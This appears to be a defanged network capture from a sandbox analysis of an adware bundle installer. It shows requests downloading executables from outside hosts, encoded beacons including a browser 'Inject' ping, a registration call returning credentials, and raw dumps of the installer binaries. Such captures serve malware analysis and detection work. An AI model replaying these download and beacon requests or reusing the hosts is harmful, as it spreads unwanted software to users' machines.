Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=145db9d1291ebe73:FF=0:TM=1429400150:LM=1429400150:S=W6FrpyQOC0Hkj2eN; expires=Mon, 17-Apr-2017 23:35:50 GMT; path=/; domain=.google.com.ua
Set-Cookie: NID=67=ELeIMq7N9y8tfqiAfQsuq2m5NytZA7U36cSEQjgAnCVgMdcuVyewWFbzwuBXa1kk4OHqiXjBentAdg4p6LwTCGS4k0opTSsRK1W-fX-phBpaaiJPI0k2OEQHzd2yr04v; expires=Sun, 18-Oct-2015 23:35:50 GMT; path=/; domain=.google.com.ua; HttpOnly
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Date: Sat, 18 Apr 2015 23:35:50 GMT
Server: gws
Content-Length: 276
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Alternate-Protocol: 80:quic,p=1
<HTML><HEAD><meta http-equiv="content-type" content="te
xt/html;charset=utf-8">.<TITLE>302 Moved</TITLE></HE
AD><BODY>.<H1>302 Moved</H1>.The document has mov
ed.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&ei=VuoyVdCFJoW
FNIS-gOgJ&gws_rd=ssl">here</A>...</BODY></HTML&g
t;..HTTP/1.1 302 Found..Location: hXXps://VVV.google.com.ua/?gfe_rd=cr
&ei=VuoyVdCFJoWFNIS-gOgJ&gws_rd=ssl..Cache-Control: private..Content-T
ype: text/html; charset=UTF-8..Set-Cookie: PREF=ID=145db9d1291ebe73:FF
=0:TM=1429400150:LM=1429400150:S=W6FrpyQOC0Hkj2eN; expires=Mon, 17-Apr
-2017 23:35:50 GMT; path=/; domain=.google.com.ua..Set-Cookie: NID=67=
ELeIMq7N9y8tfqiAfQsuq2m5NytZA7U36cSEQjgAnCVgMdcuVyewWFbzwuBXa1kk4OHqiX
jBentAdg4p6LwTCGS4k0opTSsRK1W-fX-phBpaaiJPI0k2OEQHzd2yr04v; expires=Su
n, 18-Oct-2015 23:35:50 GMT; path=/; domain=.google.com.ua; HttpOnly..
P3P: CP="This is not a P3P policy! See hXXp://VVV.google.com/support/a
ccounts/bin/answer.py?hl=en&answer=151657 for more info."..Date: Sat, 
18 Apr 2015 23:35:50 GMT..Server: gws..Content-Length: 276..X-XSS-Prot
ection: 1; mode=block..X-Frame-Options: SAMEORIGIN..Alternate-Protocol
: 80:quic,p=1..<HTML><HEAD><meta http-equiv="content-ty
pe" content="text/html;charset=utf-8">.<TITLE>302 Moved</T
ITLE></HEAD><BODY>.<H1>302 Moved</H1>.The d
ocument has moved.<A HREF="hXXps://VVV.google.com.ua/?gfe_rd=cr&
;ei=VuoyVdCFJoWFNIS-gOgJ&gws_rd=ssl">here</A>...</
<<< skipped >>>


GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=83916-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 587412
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 83916-671327/671328
..U...B...<..........wH...@.............................:.uF.......
t1.......B.............:A.u#.....................u....................
.......................t...<....U..D...E.......M..M...Q...D.....D..
............:.....D..............;.....D..............K....E.....E....
:.....t{.U..U.....M..M...Q.......M..M...Q.......M..M...Q........4....E
.....E...4...Q.)...................U......... ...........$......;.....
t{.E..E.....U..U...B.......U..U...B.......U..U...B........0....M.....M
...0...R.....................E............................K.....t{.M..
M.....E..E...H.......E..E...H.......E..E...H........,....U.....U...,..
.P.....................M............................#....}..t..M......
.......R..!....................u..........M...8...3._^.M.3........]...
........U.... ....T.H.3..E..}[email protected].
......M..M..U..................t6.........../t............\u........E.
..................U........E.;E.tR.M. M.....Q.U.R......P..H......M. M.
..3.f..M..........P.M.Q.......................3.f.......}..t..M.Q.....
.R.........E.P......Q..............R..@pG....u.j.......P...pG..M.3..a.
....].....U.........T.H.3..E.VW..|....}..t..}..t..}..t............}...
.S.....|....M.;H.........|....z..t...|.....Q..........|....B.......|..
....U.;Q.|.......>.....|......U.;Q.}...|.....Q.K........|......H.;M
.}...|.....P............|.....<...R..|.....Q..........|....E..B....
...Q.U.R.E.P..|.....R.........................|.....Q..........|....B.
.............t.3..q..........~.......^..........u.......K.........
<<< skipped >>>


GET /sd?is=sm HTTP/1.1
Range: bytes=65409-
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:14 GMT
Date: Sat, 18 Apr 2015 23:35:14 GMT
Content-Range: bytes 65409-523271/523272
Content-Length: 457863
Connection: keep-alive
d>|..O.....K.,........KUM2\..m... .[...Pm........P/c....M..'..0Y.&.
A...gk.f80IRdd..Z...x.Nn.... ....Z.F...>.4...<.-v........1H.yJ..
.)....BL.J....I...y/.*....P=....G...R.x...b. }...Z7f......!=.....=I...
`:q%I}...\<.w=.|...F....'D........o ][.....d..8..o.......v1..f{...`
....=j.%g#h..W.;H...y.....,j.(.G......_....8...V.&.2%.......y.?.1..w..
y}.V.).................'....p.....`y...=..]...E...u..y0..N.S..wy.!..n.
...[.-./up.)....$..~..u..p.....$X.L.W.9.2L#RMa...C...T.... ..P.v4.jh..
.O?...........b...Wc7..tu..?(........[...^.U....,i`q..H.=..9.........(
J...z.{...^.i....0..F.....:...A.>....`......j.h....`%WD..V..\.../d.
.._.....<....D.,...v...........K..~..$ZO......Q..lKM...1B..".b.h ..
-.|%%...\... N6...|. ........K..C....-..=u.o}.."...."..c$...T..Sr`^<
;B.....=.....Q.xj.@..|!...8 .d.6x^.`&.7...)..u{i4.Gd"[email protected]...(.Z
....r.....i...gl...f.f.dF#...g.... *P..P.b... .v......f...5.,..{..*.@m
A...."...........X...E......O".....OX..N.X..d.a.v.....uvA6..0.F.,.l..l
}.....`..?".u.c.%..X......#l.B...{......Mm...... /.....m...|;..3....6.
.OD..UB$v.U:..z............c....w....;X....X._3.!%....../. .Xs2..`....
.....-.=.......M......\. .IUO..o<......f,T.nE.[....?d.B.<`_.R..^
.0.............m..........z.yD.L8L4f........_y...}}.m."......!...W...O
......n....R....{..puo*7....L{..G.G9I..v$.e....*2e(AL'V%B...ny....$%.O
...C]z.....A.......a&....f.u.m>...!v.<.N.;..E........d.E9&..J...
.[...8e..7.......O~g.N;[..`..`.M...UW......I..drF...j.p^...c K~....>
;g:..M~u{..~.e..o...s7.V..{G.,o..^..2a>..w../.W.wb...|...2~vs..
<<< skipped >>>


GET /online/Register.aspx?CV=2.0.0.0&ProductID=12000&UserID=&Password=&OS=10&EMail=&Newsletter=&V=3.3.9.5&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList= HTTP/1.1
User-Agent: CoreWinInet
Host: online.GOOBZO.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 98
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vkmfd445f45dw155tpmcir55; path=/; HttpOnly
Date: Sat, 18 Apr 2015 23:35:36 GMT
Connection: close
<RESULT>.<USER>.<ID>bae5301f-e912-4c89-9f86-33667e27
356d</ID>.<PW>KsVYfLGi</PW>.</USER>.</RESUL
T>...



GET /ajax/libs/jquery/1.7.2/jquery.min.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.appshat.com/home
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: ajax.googleapis.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Thu, 29 Mar 2012 18:19:50 GMT
Date: Thu, 16 Apr 2015 23:35:36 GMT
Expires: Fri, 15 Apr 2016 23:35:36 GMT
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 33673
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 172863
Alternate-Protocol: 80:quic,p=1
...............F.?..<E..).b..(.........v..i.......E.,^"Y*.E......m|
#2...,.g...n.q$....;..v.f.y.o>.}...W....=.z.jq.77.Mq9/.|....^..?.[.
.r..c.....,.....&..m.g.^...\f.{z8....\e..O.<..?..^.O....oe~....u...
;."...U.w.....t6.....xs.Di/Ye.T.M|....]......:_foW~..<.z.v.{Y.]..O^
0.z.|......*DO..j.{.=_{.Cz....-U.n.x..=.../. '.x.{.Jo{|..j....n..l7..4
/.....T.{.rZ.3........C.jU..<..p.......'.V....e.J........?.m....fG.
..{......P.....t..?.B.X....k..s.c.K..-.".pS.n..P.6...:.Y.T5.4\.W;...U.
.44....;..,e.=...^..S?]c.i.C..O.h......_.....GK5.M..8....4.4.E..Q.<
...m.{[.....O.....=.lI..8....n....2.?.{/.....?&....}_...v5.....w..}..G
..w4.....l.V.......i.mw..&4Yi.@[&..........i.>.S%..aA0..fQ.hK..pP..
....<_......(.]..\-.R..z0Ym."....rPt........o.g..zM..!.P...p...Mi.l
w.rYx..|4..V.......0F..|4....<....1..-..S/....|Nx...;........".w.3.
{..Q>Z.i....x.Ut...:Jx. .3..f..G@Z.:.y..g4\j.v..B..]>...c...[.. 
z......\...:\.%.p...AB{[email protected].{?..d.[..dC....h...!X.V.w.[Q..
...:.h9\.i...........1.Ae.yr.W.........M.]..k...y...c.y.J.P..O..G....i
AJZ.{[email protected].}0.........^......&..5.....`.F.Y....<.......
....@[email protected]..`......V....78M.X yM.b.x(u....Q..f.l...f....E....
3.#..l.l...`1Y.t.N...M...o..ZR!.D.<..}.JFJ.bF..A.z.....z3.a....x.D.
..S9.D....N.n..j1...)f...$..?.z.Q>.....Q.3.'.n..P....x..|..v.....&l
t;...F..~..M.eh)..Q6..x..]..O.......G(@..N.H.... .Ip../.pjz....h.....t
UD..V.h2..........].Y4.N5........7j.}...3. [email protected]..}n4Pz..5.....h&
gt;...$...X0....U..S...u;...BV.A._ F.P.........T.F.6..I..b.%*..:..
<<< skipped >>>


GET /app/ping.ashx?e=ZuS0/O3oV2pBhrP9twY3lDDlic64H1m3swOQ QJVkEHykjeeMFQEgOIu4Zx3YXXHbkP33eKXEVDuckMp0VGSOWNPI2OPMQSa8OW8dQbOsF8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlBRsXHd/3niy&product=EXTFirefox&rnd=1429400150&it=0&action=Inject&text=GeneralInjector HTTP/1.1
Host: rep.shopper-pro.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:50 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Server: Microsoft-IIS/8.5..X-
AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Sat, 18 Apr 20
15 23:35:50 GMT..Content-Length: 0..



GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com


HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=484504, public, no-transform, must-revalidate
Last-Modified: Fri, 17 Apr 2015 14:10:10 GMT
Expires: Fri, 24 Apr 2015 14:10:10 GMT
Date: Sat, 18 Apr 2015 23:38:38 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..2015041
7141010Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5......
.A..2.....:...:......20150417141010Z....20150424141010Z0...*.H........
........c.8.c..d8..6_.S.O..~Q.0..biaE3.C......MY.W.J.'gu...5.U.X......
.....p..R.........7.ErNBD.....7.5..Z..k.8S.Y..=.h...]_.<...[t.?..D6
...6([email protected].../A".....:.v....'.._.'.thz.}.e..W...RC..5.1f/.Z..61
.~.7......F...>.FO...dw.G(5U'.[;;......T..`P. ... .......#0...0...0
..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....Ve
riSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use a
t hXXps://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code S
igning 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...
U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms o
f use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Clas
s 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.......
......m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...n
z(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*].
..*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...
:.C.Q.i~rl..<..krS..8.B..o][email protected]...
U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.veri
sign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS inco
rp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U..
......0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...*.H
<<< skipped >>>


GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=0-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 1286329
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 22:40:26 GMT
Content-Range: bytes 0-1286328/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 99c43dac805911a3599ea503f80ef8f4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: MN5OrYvUZdCAKARH3vu4RcQ7ihVFoVUpEb4g5eOkWCzO9VXMBdQNfg==
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.
<<< skipped >>>


GET /29141.ashx?e=EiBq 4UeDsX9yuFJumnxsu3zD2kP7r IQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDdPs3rFng830D4jp1ub1aA0I6tVPrdYEHziRovMIdqiLY4G r 3F6T7f9F3I6C91SUE8XIWrh60PYXV1rPYBwrFqy2cd4qoQDl0oePvh0n93NexvF9Z3oAvVYgO0yHAHEt6xicSXLpiF7kRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtY4 ujlnobk4U= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS



GET /sd?is=sm HTTP/1.1
User-Agent: Better Installer(Mozilla)
Host: install-cdn.theswiftrecord.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Pragma: no-cache
Content-Type: application/octet-stream
Server: Microsoft-IIS/7.5
Content-Disposition: attachment; filename=SwiftRecordSetup.exe
X-AspNet-Version: 4.0.30319
SVR: SP004C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Content-Length: 523272
Cache-Control: private, max-age=86400
Expires: Sun, 19 Apr 2015 23:35:13 GMT
Date: Sat, 18 Apr 2015 23:35:13 GMT
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z....... ...0.......p....@.........
................. ......l........................................s....
......................................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@[email protected].......
.....p..............@....ndata.......p...........................rsrc.
...............t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h [email protected]...\r@._^3.
[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .
<<< skipped >>>


GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=335664-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 335664
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 335664-671327/671328
..M.u..C.PWj.Q..;.......M.....E...;..}..t)[email protected]....;..._
^[..].3.......E._^[..]....V......Q...............t.Q..h..G.Q.........7
...^......^.........V........Q............W..(......t.Sh..G.Q.b......_
.7...^..O..A..G...t......_^.h..G.......h..G.R............u..B.........
._^.......W3...b...t.Qh..G.P.........7..._.............QRP..G..j.j.j.j
.j.j.j.V..j....,3........_........U..3..}.....t..8...3........]...U...
..SW.}...8......T............E..M..E.....u..l..._[..]..{..t.S........_
[..].V.M..U.R.E.PSQ............uk.{8..M.t....t..U........M...tM.C8H...
.......$...E..........QW.S..........u ..8..........t.S............z...
..^_[..]......(.................V.....QW..............................
`.....Q............3....H....y....I.m-E.v-E..-E..-E..-E..-E..-E..-E..-
E..-E..-E.....V.0Wj.j.3.....H......(......G.t..._^............U.....SV
.u...W..(...3..}.....6...9.,.....*....M...t..................9.p......
...9.,.........9.D.........9_.u ............t.h..G.....H........h..G..
...H.............u._^.C.[..]...T....U.RWSPV.L.......E...t.S....H..E...
._^[..]..E.;.t....... ................l...S.. .....$.......H..........
............}....G...t.P....H.....G..........._^..[..]._^3.[..].U..V..
....$......(...t...............D....Q...,....t...D....t.V.............
....u.WV.w/.........U......^].......U...}..V.u.W......u .G,..t........
t........u........W......GTPV.|[email protected]@...._3.^]....
........U..V.u.W.}.VW..........u.9.t..._^]..0.._^]......U..QV.3Wj.....
.j.V.FP.FT..B..j.j.V..B..j.j.V..C..j.j.V..B...E.P.........4..u.9.t
<<< skipped >>>


GET /16634.ashx?e=PcwT4QFtuPBwlKCj/kNh870oSfJOuBg0zZ0dT4XGkSyMDmRWpWBZ0CAvELRpepitjKjHf0fty0jaP8uCRyw5tKzZqKuvEwKkWLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jHr1mKZNfZywrNszNzik7HYYan0yy1LdwNMNN2yVHejOoCpRmhVhpio8u6Yg5dyBwLrN0DyGmXtUSf/buJgAiMrml2XdXjKhJm0LdlReY2/iE4Rn18L003uz0Lu2aZ4hDhQmP15je1GaTsjjJ8mc3T1bCKEZtK5kNYTUdhyOmg8ojMH Sx5lZQUBVKMMLvbAAl / nQs3MyUlkcwNkLwyotprHUkJgNhsSKxc5Do0zQJ2wETeChqRo2NpoLFcIffYuKqXv8VBC8EfKsBoA VW3YJtcVV8eOM1J2ERIpcBp2X3ENvTctwS0p96kHpWYXdJ76MImHBnaSt3UshJMp43cJyR1O2m34IkWxkA58Tiwe594khRQjb0om5r9iFtppC1uEsoMnuAcfjiugW2mv9tjlm1PwhpieWJw== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:42 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:42 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=321582-643164
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 321583
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 22:40:26 GMT
Content-Range: bytes 321582-643164/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 99c43dac805911a3599ea503f80ef8f4.cloudfront.net (CloudFront)
X-Amz-Cf-Id: aLJXh8sVzMFaGMw5A9fEaBHzk3mYTIj0FMTEscZlmGaX01iE3sROJA==
..`../r"k>F-O../......I......(..vWPN.. ...J......."..j&.b.n........
.........V...O_.Zj...~4..T...}TMZ.....y.s.i.....G..b......[.x....,3...
.Q....%.'.M.m.}........j..E...........m......>.P....y.x".G.2c....}.
'.Q.....eP../..... h....9.8m(....'}"..(.U.N.....6E.._._&J.rv...iS.....
t...^^!......g..X..$.../...|..l...!.E..Q9..#.$.I...Y..<G...........
._.`TKq`....*...E.R...h............H^A.W.2=....%m..9s...p..WS ...n....
6_..U...d...N........*......aqj.......e......f...J.u.4...3...&j.=~..3.
.E..x.a....X..".G.J.aQSF1..4.b..O...L.....a.[..,............8..!M.....
....#v..$..Gv}h../.6o.x.:/.r..5lF....5W.4..s..\q~.D >{.wJ/..DA S...
.MOb....Y'E.0..\Ah.9.....{.:...-)kj[..q.-....n>.IC..2......m-...*f"
JmmVr....".o..n....\O$..V~p*I...x[&..d{......R0.L.>C.Xn....0..]....
$..L..5=k.q.....A.l..I.'..g.....$.....u{.c......).;Ke\H..?.x...8......
{<.p.....=D.........W.....B.R.p.E....U..HM....#..S.3f<r..1|:...N
"P}O..U... .5.JZ..x..>8..m......H....E...N...Y.._.\..x...S..<..*
`=.@[email protected].......)Y.b.@H/..?..n9b......4....x["..i.wH.....c...iP7k.s.r
.........V:;M..=I.d..........K'[email protected].....
...........S....?_..F...#-Of..`:......&.. E..Rg/..{...E..f.....n...O.5
...'zd..*.T.....A..#!"@.>.......AW...$ra....M....... <O.>l[..
.....n...c.g.).*N..A=..[6q..'..2..Zg..h}........'>...^kGT......,i..
..m|y....I..V...D....#.]............s.k...E.x....Z........J?..{m......
....T.).*.4".....cv._....7S[2O.)<.f&D.`...73t...^{.._k'..{.ref...gS
...=(..Q.4.4F...O....J.t...9t.;..!OH$S..B....[....9....mS....'.^..
<<< skipped >>>


GET /home/smt_istartsurf.exe HTTP/1.1
Range: bytes=167832-
User-Agent: Better Installer(Mozilla)
Host: VVV.girlliuxiaowei.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Server: nginx
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Type: application/octet-stream
Content-Length: 503496
Last-Modified: Wed, 15 Apr 2015 07:16:46 GMT
Connection: keep-alive
Expires: Tue, 21 Apr 2015 23:35:16 GMT
Cache-Control: max-age=259200
Content-Range: bytes 167832-671327/671328
...}..u..x&.........._.....].V.u...u..[&..........^........u......Y...
.#.....V.;.t.3.^]...U...}..u...&..........^.....]..E...t.j..p..0.u....
.....].j.h..H..9z...e..3..u........u...%.........l^...........]....t..
[email protected]...@u..}..G.=....v....}.....u.V.....Y.e..V.....V.....YY.f..
....N....t.....F.j._.-.E...u W..#..Y..u.....H..M.....N..............N.
.~..F....f...E...........E...y....u..{...Y...U...=..H..u..lx...u...v..
h......s..YY][email protected]
..u..6.<.@[email protected][email protected][email protected][email protected]....
u.j..S...Y.......u.j..B...Y.3....u........y.j...u..Y..TpG....I........
.H........y.j...u..Y.......y.j..~u..Yj..Us..Y;.t.P.ku..Y.R....E..t...M
...j.YQPVh..@..|....E.9u.u.P..t....u.....E......M.PQ.....YY..e..E..E..
}..u.P..t....t...E......E...w...............U.... .E.VWj.Y..vG..}....E
..E._.E.^[email protected]$.......t$.......
tN......u........$......$..........~.....3.........t..A...t2..t$.....t
......t....A..L$. ...A..L$. ...A..L$. ...A..L$. .......U..WV.u..M..}..
.....;.v.;.............r..=..I..t.WV......;.^_u...I........u..........
r)...$...B...........r.......$.$.B..$. .B...$...B..4.B.`.B...B.#......
F..G..F.....G..........r....$...B..I.#......F.....G..........r....$...
B..#.................r....$...B..I...B...B...B...B...B...B...B...B..D.
..D...D...D...D...D...D...D...D...D...D...D...D...D..............$...B
... .B.(.B.4.B.H.B..E.^_........E.^_........F..G..E.^_...I......F..G..
F..G..E.^_....t1..|9.......u$.........r......$...B......$.\.B..I..
<<< skipped >>>


GET /app/ping.ashx?e=043Mckb8Lng3732dIkiRjr0oSfJOuBg0INaO4xo6fthi/MbJPcnCndJteToOegQWolvEm33cp87RtCIb96DZnR6RoJ10TU0s6CBrfbZ/enS9XnvFref6fjEsdSRpTTrrYOU1y/YINRGPoXLdfu1iHsN4ZFLSmed5t1icrRwtJSYfgaDucvfUYJPYLbY Xo6Rl8axoeNMkn6e1ZUE2Pql5n8tp3djqATVmXFZN21mt4jCW/lCH460cZqItAhOuCTzzP/VT GEYs73iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22Ocfvb9IYuqI5f6VK1qPKGu130R0eSeGqH4uB5vT09TkZhae/9JiQCFNAKCtNaB71zmlXUgaWWscg8vFDeL0Cq7CQEZGf87LMbmF2K0yaQKTQ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SBUA)
Host: rep.youtubeaccelerator.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: image/gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 23:35:36 GMT
Content-Length: 0
HTTP/1.1 200 OK..Cache-Control: private..Content-Type: image/gif..Serv
er: Microsoft-IIS/7.5..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.
NET..Date: Sat, 18 Apr 2015 23:35:36 GMT..Content-Length: 0..



GET /infv5/index/3428/3rd HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: dqoup4b5zs0bi.cloudfront.net
Accept: */*
Accept-Encoding: gzip, deflate
Connection:keep-alive


HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
Date: Sat, 18 Apr 2015 23:35:49 GMT
Location: hXXp://dlrkbt247pbk6.cloudfront.net/3428_92a5d683c188790231b1aa2af09de41e/2.pak
Server: nginx
X-Cache: Miss from cloudfront
Via: 1.1 2dc430fff474a8f2dc029f6910b5eecc.cloudfront.net (CloudFront)
